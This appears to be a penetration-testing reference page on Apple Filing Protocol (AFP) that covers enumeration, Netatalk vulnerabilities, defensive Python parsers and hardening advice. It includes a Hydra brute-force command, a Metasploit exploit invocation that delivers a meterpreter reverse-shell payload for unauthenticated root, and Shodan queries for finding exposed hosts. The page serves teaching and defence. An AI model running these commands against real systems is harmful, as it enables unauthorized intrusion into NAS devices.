---
title: "584 - Afp"
weight: 584
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **Study note**: This document covers penetration-testing methodology for **584 - AFP** and is intended as a reference for information-security beginners and practitioners.

⚠️ **Legal notice**: This document is for learning and authorized testing only. Unauthorized testing of systems may violate applicable laws and regulations.

---

## 548 - Pentesting Apple Filing Protocol (AFP)

### Basic Information

The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within **Apple File Services** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms.

Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:

* Legacy macOS / Mac OS 9 environments
* NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source **Netatalk** daemon
* Mixed-OS networks where Time-Machine-over-AFP is still enabled

**Default TCP port:** **548** (AFP over TCP / DSI)

```bash
PORT     STATE SERVICE
548/tcp  open  afp
```

---

### Enumeration

#### Quick banner / server info

```bash
## Metasploit auxiliary
use auxiliary/scanner/afp/afp_server_info
run RHOSTS=<IP>

## Nmap NSE
nmap -p 548 -sV --script "afp-* and not dos" <IP>
```

Useful AFP NSE scripts:

| Script | What it does |
|--------|--------------|
| **afp-ls**            | List available AFP volumes and files |
| **afp-brute**         | Password brute-force against AFP login |
| **afp-serverinfo**    | Dump server name, machine type, AFP version, supported UAMs, etc. |
| **afp-showmount**     | List shares together with their ACLs |
| **afp-path-vuln**     | Detects (and can exploit) the directory-traversal flaw CVE-2010-0533 |

The NSE brute-force script can be combined with Hydra/Medusa if more control is required:

```bash
hydra -L users.txt -P passwords.txt afp://<IP>
```

#### Interacting with shares

*macOS*
```bash
## Finder → Go → "Connect to Server…"
## or from the terminal (USER, PASSWORD, <IP> and SHARE are placeholders)
mkdir /Volumes/afp
mount_afp afp://USER:PASSWORD@<IP>/SHARE /Volumes/afp
```

*Linux* (using `afpfs-ng`, packaged in most distros)
```bash
apt install afpfs-ng
mkdir /mnt/afp
## USER, PASSWORD, <IP> and SHARE are placeholders
mount_afp afp://USER:PASSWORD@<IP>/SHARE /mnt/afp
## or interactive client
afp_client <IP>
```

Once mounted, remember that classic Mac resource-forks are stored as hidden `._*` AppleDouble files – these often hold interesting metadata that DFIR tools miss.

---

### Common Vulnerabilities & Exploitation

#### Netatalk unauthenticated remote code execution chain (2022)

Several NAS vendors shipped **Netatalk ≤3.1.12**. A lack of bounds checking in `parse_entries()` allows an attacker to craft a malicious **AppleDouble** header and obtain **remote root** before authentication (**CVSS 9.8 – CVE-2022-23121**). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available.
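The two places this page touches AppleDouble data (the hidden `._*` files mentioned under "Interacting with shares", and the unchecked header parsing behind CVE-2022-23121) come down to the same format: a fixed 26-byte header followed by an entry table whose offsets and lengths are attacker-controlled input. The following parser is an added example written for this page; it is not Netatalk's `parse_entries()` nor any vendor code. It shows what a DFIR triage tool should extract from a `._*` file and, more importantly, the bounds checks that must run before any offset from the table is used. The sample file and the tampered copy are constructed inline; the entry-id table and the 32-bit wrap note reflect the AppleSingle/AppleDouble specification, and the `MAX_ENTRIES` cap is a policy choice of this example, not a value from the spec.

```python
"""Bounds-checked parser for AppleDouble (._*) headers.

Added example, not Netatalk code: the entry table is the untrusted part of
the format, and every offset/length in it must be validated against the
real file size before it is used to slice data.
"""
import struct

APPLEDOUBLE_MAGIC = 0x00051607
APPLESINGLE_MAGIC = 0x00051600
VERSION_2 = 0x00020000
HEADER_LEN = 26   # magic(4) + version(4) + filler(16) + entry count(2)
ENTRY_LEN = 12    # entry id(4) + offset(4) + length(4)
MAX_ENTRIES = 64  # hard cap chosen for this example; real writers emit a handful

# Entry ids defined by the AppleSingle/AppleDouble specification.
ENTRY_NAMES = {1: "Data Fork", 2: "Resource Fork", 3: "Real Name", 4: "Comment",
               8: "File Dates Info", 9: "Finder Info"}


def parse_appledouble(blob: bytes) -> list[dict]:
    """Return the entries of an AppleDouble/AppleSingle header, or raise ValueError."""
    if len(blob) < HEADER_LEN:
        raise ValueError("file too short for an AppleDouble header")
    magic, version = struct.unpack(">II", blob[:8])
    if magic not in (APPLEDOUBLE_MAGIC, APPLESINGLE_MAGIC):
        raise ValueError(f"bad magic 0x{magic:08x}")
    if version != VERSION_2:
        raise ValueError(f"unsupported version 0x{version:08x}")
    (count,) = struct.unpack(">H", blob[24:26])
    if count > MAX_ENTRIES:
        raise ValueError(f"implausible entry count {count}")
    table_end = HEADER_LEN + count * ENTRY_LEN
    if table_end > len(blob):
        raise ValueError("entry table runs past end of file")

    entries = []
    for i in range(count):
        pos = HEADER_LEN + i * ENTRY_LEN
        eid, off, length = struct.unpack(">III", blob[pos:pos + ENTRY_LEN])
        # The check that matters: the entry must start after the table and end
        # inside the file. Python ints do not wrap, so off + length is exact;
        # C code doing the same in uint32 must also reject off + length < off.
        if off < table_end or off + length > len(blob):
            raise ValueError(f"entry {eid}: range {off}+{length} exceeds {len(blob)}-byte file")
        entries.append({"id": eid, "name": ENTRY_NAMES.get(eid, f"unknown({eid})"),
                        "offset": off, "length": length, "data": blob[off:off + length]})
    return entries


def summarize(entries: list[dict]) -> dict:
    """Pull the fields DFIR analysts usually want from a parsed header."""
    out = {}
    for e in entries:
        if e["id"] == 9 and len(e["data"]) >= 8:
            out["finder_type"] = e["data"][:4].decode("mac_roman")      # Finder type code
            out["finder_creator"] = e["data"][4:8].decode("mac_roman")  # Finder creator code
        elif e["id"] == 3:
            out["real_name"] = e["data"].decode("utf-8", "replace")
        elif e["id"] == 2:
            out["resource_fork_bytes"] = e["length"]
    return out


def validate(blob: bytes) -> str:
    """Return 'ok' or the reason the header was rejected (handy for bulk triage)."""
    try:
        parse_appledouble(blob)
        return "ok"
    except ValueError as exc:
        return str(exc)


def build_appledouble(entries: list[tuple[int, bytes]]) -> bytes:
    """Assemble a constructed AppleDouble file for offline testing (not a real capture)."""
    table_end = HEADER_LEN + len(entries) * ENTRY_LEN
    table, payload, cursor = b"", b"", table_end
    for eid, data in entries:
        table += struct.pack(">III", eid, cursor, len(data))
        payload += data
        cursor += len(data)
    return (struct.pack(">II", APPLEDOUBLE_MAGIC, VERSION_2) + b"\x00" * 16
            + struct.pack(">H", len(entries)) + table + payload)


# Constructed sample: Finder Info (type TEXT, creator ttxt) plus a Real Name entry.
FINDER_INFO = b"TEXTttxt" + b"\x00" * 24
SAMPLE = build_appledouble([(9, FINDER_INFO), (3, b"notes.txt")])

# Same file with the Real Name length field corrupted to 0xFFFFFFF0: a naive
# uint32 off + length check would wrap to a small number; this parser rejects it.
TAMPERED = bytearray(SAMPLE)
struct.pack_into(">I", TAMPERED, HEADER_LEN + ENTRY_LEN + 8, 0xFFFFFFF0)
TAMPERED = bytes(TAMPERED)

if __name__ == "__main__":
    print(summarize(parse_appledouble(SAMPLE)))
    print(validate(TAMPERED))
```

Run over a directory of recovered `._*` files, `validate()` separates well-formed headers from truncated or hostile ones before `summarize()` touches any data; the rejection message names the entry and range so the offending file can be examined by hand.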

Metasploit (>= 6.3) ships the module `exploit/linux/netatalk/parse_entries` which delivers the payload via DSI `WRITE`.

```bash
use exploit/linux/netatalk/parse_entries
set RHOSTS <IP>
set TARGET 0   # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
run
```

If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as **root**.

#### Netatalk OpenSession heap overflow (2018)

Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the **DSI OpenSession** handler allowing unauthenticated code execution (**CVE-2018-1160**). A detailed analysis and PoC were published by Tenable Research.

#### Other notable issues

* **CVE-2022-22995** – Symlink redirection leading to arbitrary file write / remote code execution when AppleDouble v2 is enabled (3.1.0 - 3.1.17).
* **CVE-2010-0533** – Directory traversal in Apple Mac OS X 10.6 AFP (detected by `afp-path-vuln.nse`).
* Multiple memory-safety bugs were fixed in **Netatalk 4.x (2024)** – recommend upgrading rather than patching individual CVEs.

---

### Defensive Recommendations

1. **Disable AFP** unless strictly required – use SMB3 or NFS instead.
2. If AFP must stay, **upgrade Netatalk to ≥ 3.1.18 or 4.x**, or apply vendor firmware that back-ports the 2022/2023/2024 patches.
3. Enforce **Strong UAMs** (e.g. *DHX2*), disable clear-text and guest logins.
4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely.
5. Periodically scan with `nmap -p 548 --script afp-*` in CI/CD to catch rogue / downgraded appliances.
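Recommendations 3 and 5 can be checked from the same data that `afp-serverinfo` prints: the FPGetSrvrInfo reply a server returns to a DSI GetStatus request, which lists the UAMs it will accept. The decoder below is an added example written for this page; it is not Nmap's NSE script nor Netatalk code. It parses that reply and flags servers that still offer guest ("No User Authent") or clear-text ("Cleartxt Passwrd") login, or that offer no strong UAM at all, so an inventory scan can fail on downgraded appliances. The DSI header layout, the FPGetSrvrInfo field order and the UAM strings follow the AFP specification; the server flag value `0x0020` (SupportsTCP/IP) and the sample reply are constructed here rather than captured from a real host.

```python
"""Parse an AFP FPGetSrvrInfo (DSI GetStatus) reply and audit the offered UAMs.

Added example, not from the original page or from Netatalk/Nmap: it decodes
the same banner that afp-serverinfo prints and checks it against the
"strong UAMs only" recommendation.
"""
import struct

DSI_REPLY_FLAG = 1   # DSI flags byte: 0 = request, 1 = reply
DSI_GETSTATUS = 3    # DSI command code for GetStatus

# UAM names exactly as advertised on the wire.
WEAK_UAMS = {"No User Authent", "Cleartxt Passwrd", "Randnum Exchange", "2-Way Randnum"}
STRONG_UAMS = {"DHX2", "DHCAST128", "Client Krb v2"}


def _pstring(buf: bytes, off: int) -> tuple[str, int]:
    """Read a Pascal string (1-byte length prefix); return (text, offset after it)."""
    if off >= len(buf) or off + 1 + buf[off] > len(buf):
        raise ValueError("Pascal string runs past end of body")
    n = buf[off]
    return buf[off + 1:off + 1 + n].decode("utf-8", "replace"), off + 1 + n


def _pstring_list(buf: bytes, off: int) -> list[str]:
    """Read a count byte followed by that many Pascal strings."""
    if off >= len(buf):
        raise ValueError("list offset outside body")
    count, off = buf[off], off + 1
    items = []
    for _ in range(count):
        s, off = _pstring(buf, off)
        items.append(s)
    return items


def parse_server_info(packet: bytes) -> dict:
    """Decode a DSI GetStatus reply: 16-byte DSI header followed by FPGetSrvrInfo."""
    if len(packet) < 16:
        raise ValueError("short DSI header")
    flags, command, _req_id, _err, length, _reserved = struct.unpack(">BBHIII", packet[:16])
    if flags != DSI_REPLY_FLAG or command != DSI_GETSTATUS:
        raise ValueError(f"not a DSI GetStatus reply (flags={flags}, command={command})")
    body = packet[16:16 + length]
    if len(body) < 11:
        raise ValueError("short FPGetSrvrInfo body")
    # Five big-endian uint16 fields precede the server-name Pascal string:
    # machine-type offset, AFP-version list offset, UAM list offset, icon offset, flags.
    machine_off, vers_off, uam_off, _icon_off, srv_flags = struct.unpack(">HHHHH", body[:10])
    name, _ = _pstring(body, 10)
    machine, _ = _pstring(body, machine_off)
    return {
        "server_name": name,
        "machine_type": machine,
        "afp_versions": _pstring_list(body, vers_off),
        "uams": _pstring_list(body, uam_off),
        "flags": srv_flags,
    }


def audit_uams(info: dict) -> list[str]:
    """Findings for Defensive Recommendation 3: no guest/clear-text, a strong UAM present."""
    offered = set(info["uams"])
    findings = [f"weak UAM offered: {u}" for u in sorted(offered & WEAK_UAMS)]
    if not offered & STRONG_UAMS:
        findings.append("no strong UAM (DHX2 / DHCAST128 / Kerberos) offered")
    return findings


def build_sample_reply(server_name: str, machine_type: str,
                       versions: list[str], uams: list[str]) -> bytes:
    """Assemble a constructed GetStatus reply for offline use (not a captured packet)."""
    def p(s: str) -> bytes:
        b = s.encode()
        return bytes([len(b)]) + b

    def plist(items: list[str]) -> bytes:
        return bytes([len(items)]) + b"".join(p(i) for i in items)

    name, machine, vers, uam = p(server_name), p(machine_type), plist(versions), plist(uams)
    machine_off = 10 + len(name)
    vers_off = machine_off + len(machine)
    uam_off = vers_off + len(vers)
    body = (struct.pack(">HHHHH", machine_off, vers_off, uam_off, 0, 0x0020)  # 0x0020: SupportsTCP/IP
            + name + machine + vers + uam)
    return struct.pack(">BBHIII", DSI_REPLY_FLAG, DSI_GETSTATUS, 0, 0, len(body), 0) + body


# Constructed sample: a NAS that still offers guest and clear-text login next to DHX2.
SAMPLE = build_sample_reply("SAMPLE-NAS", "Netatalk",
                            ["AFP3.4", "AFP3.3", "AFP3.2"],
                            ["No User Authent", "Cleartxt Passwrd", "DHX2"])

if __name__ == "__main__":
    info = parse_server_info(SAMPLE)
    print(info)
    for finding in audit_uams(info):
        print("FINDING:", finding)
```

In a scheduled scan the raw reply comes from a TCP connection to port 548 (a 16-byte DSI GetStatus request with flags 0 and command 3, then read the reply); the parsing and the policy check above are the parts that decide whether the job passes or fails.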

---

#### [Brute-Force](../generic-hacking/brute-force.md#afp)

---


### Search Engine Queries

#### FOFA

```bash
# FOFA search syntax (AFP listens on TCP 548, as stated in Basic Information above)
port="548"
```

#### Shodan

```bash
# Shodan search syntax (AFP listens on TCP 548, as stated in Basic Information above)
port:548
```

#### ZoomEye

```bash
# ZoomEye search syntax (AFP listens on TCP 548, as stated in Basic Information above)
port:548
```

---

## 📖 References

- [HackTricks - 584-afp](https://book.hacktricks.wiki/en/network-services-pentesting/584-afp.html)

